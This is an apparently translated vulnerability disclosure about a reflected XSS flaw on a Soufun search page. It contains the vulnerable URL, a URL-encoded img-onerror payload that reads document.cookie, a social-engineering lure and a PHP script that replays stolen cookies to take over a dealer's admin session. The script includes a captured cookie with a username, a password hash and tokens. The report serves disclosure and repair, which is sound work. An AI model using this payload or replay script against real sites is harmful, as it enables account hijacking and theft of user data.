Soufun's xss vulnerability can cause csrf to steal user accounts

The output of input parameters is not strictly filtered, resulting in reflected xss, leakage of user cookies, and information theft. The user login vulnerability was reported twice in wooyun and was not approved, the prompt that the second review fails is: the problem does exist but it is not harmful. The landlord believes that the reflected xss vulnerability can be exploited in a big or small manner. So the landlord is digging deeper to see if the hazards of this vulnerability can be magnified. (1) Find the target link of the xss vulnerability: http://home.soufun.com/jiancai/SearchList.aspx Vulnerability reproduction method: Enter <a href = "at the target link" http://www.wooyun.org "> click to participate in the activity </a>. The reflected xss is displayed under IE. There is no harm for users who have not logged on, but for users who have logged on, we can see what is stored in the cookie: As you can see, the user name, the encrypted passwords are all here. Here we will not discuss how to crack the encrypted password and continue to evolve the vulnerability. (2) Find the target, which is a matter of social engineering. It is also easy to find users who search for house decoration, such: http://home.soufun.com/shop/40794726/ , Send this link to the user http://home.soufun.com/jiancai/SearchList.aspx ? Level = 1 & q = % 3Ca + href % 3D % 22 http % 3A % 2F % 2Fwww.wooyun.org % 22% 3E % 3 Cimg + src % 3D % 22% 23% 22% 2F *** % 2 fonerror % 3 Dalert % 28document. cookie % 29 + width % 3D100% 3E % B5 % E3 % BB % F7 % B2 % CE % BC % D3 % BB % EE % B6 % AF % 3C % 2Fa % 3E & category = & x = 57 & y = 14 title: Soufun offers promotions and things, if the current user has logged on to the decoration helper background and accessed this link, congratulations, the user has been attacked by the reflected xss. What if it is not the cookie of the alert user but the cookie of the user? What are the dangers? (3) Suppose we have stored the user's cookie through the xss in step (2) (in fact, it is very easy to collect, just an http request ), we can use the script to run a run and see what the effect is:

<?phpfunction explode_cookie($cookie) {$cookie_arr = explode(";", $cookie);foreach ($cookie_arr as $cookie_str) {list($cookie_key,$cookie_value) = explode("=", $cookie_str);$cookie_key = trim($cookie_key);setcookie($cookie_key,$cookie_value,1800,'/','soufun.com');}}function url_replace($str) {$pattern_var = "/href=(['\"])\//";$replace_var = "href='http://dianpu.soufun.com/";if (preg_match($pattern_var, $str)) {$str = preg_replace($pattern_var, $replace_var, $str);}return $str;}$admin_url = array("http://dianpu.soufun.com/jiancai/dealer/top.aspx","http://dianpu.soufun.com/jiancai/dealer/left.aspx","http://dianpu.soufun.com/index.aspx", );$cookie = "unique_cookie=U_b8nnhkz09nmlasskytp5f3ymg54hk50614w*12; __utmc=77873355; jiatxShopWindow=1; global_cookie=b8nnhkz09nmlasskytp5f3ymg54hk50614w; __utma=77873355.1662561517.1376029049.1376029049.1376037185.2; __utmb=77873355.9.10.1376037185; __utmz=77873355.1376029049.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); passport=usertype=1&userid=42545987&username=testxss89&password=381F5D8A96DFF049&isvalid=6BB50273C1F61D91962B0E259B086163&validation=6BB50273C1F61D912EC3FE322B6620E8917B57BF3DAD9B00; homezxb=sogo_dealerid=64451&Sogo_validation=C89DBE9F840476F053AEB80D5B7645B30D8754A1447B3A21&home_weike_userid=-64451&home_weike_user_validation=C89DBE9F840476F037BB50C741626714147ECDCB693EE44F; rememberRightname=testxss89";$ch = curl_init();curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);explode_cookie($cookie);foreach ($admin_url as $url) {$header = array();$header[] = "Cookie: {$cookie}\r\n";curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HTTPHEADER, $header);$data = curl_exec($ch);$data = url_replace($data);echo $data;}curl_close($ch);

 

The intention of the above script is to simulate the backend of the http request for decoration. The normal background is like this: the background after Simulated logon is like this:





As you can see, I have logged on to the account of the current user ~ So what else can't be done? This vulnerability can be more imaginative, regardless of the hazards, and we hope to fix it as soon as possible. Solution:

(1) we recommend that you do not rely on cookies. After the connection session is disconnected, the cookie becomes invalid. (2) xss vulnerability repair